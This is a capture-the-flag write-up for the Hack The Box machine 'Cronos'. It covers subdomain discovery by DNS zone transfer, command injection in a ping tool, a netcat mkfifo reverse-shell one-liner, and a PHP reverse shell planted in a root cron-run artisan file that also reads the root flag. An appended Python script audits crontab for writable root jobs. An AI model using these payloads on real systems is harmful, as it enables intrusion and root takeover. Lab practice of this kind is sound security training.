Cronos — HTB Machine

Rishabh Rai
Mar 30, 2024

Today we are going to solve another machine called Cronos. I have fired it up and run my nmap script to give me initial scans, which show three ports open. Let’s dig deeper into those.

Upon visiting the webpage:

When I clicked on Documentation, it took me to the documentation page of Laravel.

Since everything was very simple and I couldn’t find anything, I tried both Gobuster and Sublist3r to find a vhost/subdomain of the parent domain, but for some reason I was unable to find anything. When I did some research, I found out I was on the right path, so I restarted the machine and then tried again.

I was still not able to get any vhost from the machine.
Then I came across a command which helped me to get the value for the subdomain:

host -l <domain_name> <IP>

I will add admin.cronos.htb in the hosts file.

Upon loading the admin page I only got a simple login page, then I started dirsearch on the domain admin.cronos.htb.
Found config.php, but it was supposedly a rabbit hole.

Didn’t find anything in directory listing as well.

We do have a cookie here

I tried SQL injection on the tool and found this …….

Net tool is a tool that gives you two functions:
One → to traceroute
Two → to PING

Tampering with the Burp request for PING, I got command injection on the machine.

Since we have command injection, we can execute a command and then get a reverse shell.

I used this payload and URL-encoded it to run on the box:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

I changed the content of artisan and I did get a connection request, but it did not give me a reverse shell on my machine.

I tried some more times but it did not work, so I had to get creative and get the root flag.

Content of Artisan:

<?php
// Change these values accordingly
$ip = '10.10.14.6';
$port = 1456;

// Create a TCP/IP socket
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);

// Attempt to connect to the provided IP and port
if (socket_connect($sock, $ip, $port) === false) {
    die('Could not connect to ' . $ip . ':' . $port . PHP_EOL);
}

// Set socket to non-blocking mode
socket_set_nonblock($sock);

// Spawn a shell
shell_exec('bash -c "bash -i >& /dev/tcp/' . $ip . '/' . $port . ' 0>&1"');
$output = shell_exec('cat /root/root.txt');
file_put_contents('/var/www/laravel', $output);
?>

>>>> root.txt has the content of root flag
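
The root step above worked because a cron entry run as root executes a file that a lower-privileged account could rewrite. As an added example (not part of the original write-up), here is a Python check a defender could run against /etc/crontab-style text to flag root jobs whose referenced files, or any directory above them, are writable by a non-root account. The function names and the trusted_uids and top parameters are assumptions made for this sketch.

```python
import os
import shlex
import stat

def root_commands(crontab_text):
    """Yield the command of each /etc/crontab-style line whose user field is root."""
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        n = 1 if line.startswith("@") else 5  # "@reboot" form has one schedule field
        fields = line.split(None, n + 1)
        if len(fields) == n + 2 and fields[n] == "root":
            yield fields[n + 1]

def untrusted_writer(path, trusted_uids):
    """Return why an account outside trusted_uids can modify path, or None."""
    st = os.stat(path)
    if st.st_uid not in trusted_uids:
        return "owned by uid %d" % st.st_uid
    # In a sticky directory (e.g. /tmp) others cannot replace entries they do not own.
    sticky_dir = stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH) and not sticky_dir:
        return "group/world writable (mode %o)" % stat.S_IMODE(st.st_mode)

def audit(crontab_text, trusted_uids=(0,), top="/"):
    """Return (argument, weak_path, reason) for files named in root cron commands."""
    findings = []
    for cmd in root_commands(crontab_text):
        try:
            tokens = shlex.split(cmd)
        except ValueError:  # unbalanced quotes: review that line by hand
            continue
        for tok in tokens:
            if not (tok.startswith("/") and os.path.isfile(tok)):
                continue  # skips redirections, options and devices such as /dev/null
            path = os.path.realpath(tok)
            while True:  # the file itself, then each directory above it up to `top`
                reason = untrusted_writer(path, trusted_uids)
                if reason or path == top or path == os.path.dirname(path):
                    break
                path = os.path.dirname(path)
            if reason:
                findings.append((tok, path, reason))
    return findings

if __name__ == "__main__":
    with open("/etc/crontab") as fh:
        for arg, weak, reason in audit(fh.read()):
            print("root cron runs %s: %s is %s" % (arg, weak, reason))
```

Any finding means the job should point at a root-owned, non-writable copy of the script or run as the account that owns the file instead of root.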

That is how we have PAWNED another machine for the day!! HAPPY HACKING UNTIL NEXT TIMEEE

My Review:
This box is a fundamental one, and you might have to think out of the box at the start and the end; other than that, the journey in the middle is a breeze if you are up for it. There are several rabbit holes. SO MIND YOUR STEPS !! 😂😁
